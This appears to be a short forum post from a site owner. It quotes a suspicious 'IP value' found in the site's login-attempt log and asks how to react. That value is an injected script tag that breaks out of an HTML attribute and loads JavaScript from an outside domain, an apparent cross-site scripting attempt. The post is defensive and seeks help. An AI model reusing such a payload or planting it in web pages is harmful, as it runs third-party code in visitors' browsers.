strange IP value entry “privacylocationforloc”

in the log file of login attempts I noticed the following as IP value:
\”><script type=text/javascript src=\’https://cd.privacylocationforloc.com/track&tp=3\’></script>
any idea what happened here? how to react upon this? the site seems to be ok still.
